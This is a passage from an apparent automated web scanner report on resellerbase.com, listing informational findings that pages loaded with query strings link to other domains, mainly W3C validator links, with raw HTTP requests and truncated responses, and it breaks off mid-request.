Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.267. http://www.resellerbase.com/goods-wholesale/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/goods-wholesale/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /goods-wholesale/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.268. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.269. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.270. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.271. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.272. http://www.resellerbase.com/goods-wholesale/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/goods-wholesale/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /goods-wholesale/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.273. http://www.resellerbase.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/login.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/login.php?f=1&b=%2Fcp%2F

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /login.php?f=1&b=%2Fcp%2F HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Content-Type: text/html
Content-Length: 9223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.274. http://www.resellerbase.com/modify.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/modify.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/modify.php?id=555-555-0199@example.com&pflag=pass&submit=Submit

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /modify.php?id=555-555-0199@example.com&pflag=pass&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/modify.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Update a Listing</ti
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.275. http://www.resellerbase.com/new.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/new.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/new.php?st=date&dt=1288843200

The response contains the following links to other domains:

http://hubshout.com/
http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /new.php?st=date&dt=1288843200 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/new.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New Listings</title>
...[SNIP]...
<td width="616" height="20" valign="middle" bgcolor="#ececec">
<a href="http://hubshout.com" name="link_46"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://hubshout.com" name="link_46"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.276. http://www.resellerbase.com/other/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/other/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.277. http://www.resellerbase.com/other/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/other/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/other/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /other/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.278. http://www.resellerbase.com/power_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/power_search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/power_search.php?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /power_search.php?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/power_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Power Search</title>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.279. http://www.resellerbase.com/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/rating.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/rating.php?id=555-555-0199@example.com&rating=4

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /rating.php?id=555-555-0199@example.com&rating=4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Rate a link</title>

...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.280. http://www.resellerbase.com/resources-information/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.281. http://www.resellerbase.com/resources-information/ebooks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.282. http://www.resellerbase.com/resources-information/ebooks/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/ebooks/googlepr.php?link_id=11

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/ebooks/googlepr.php?link_id=11 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.283. http://www.resellerbase.com/resources-information/ebooks/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/resources-information/ebooks/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /resources-information/ebooks/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
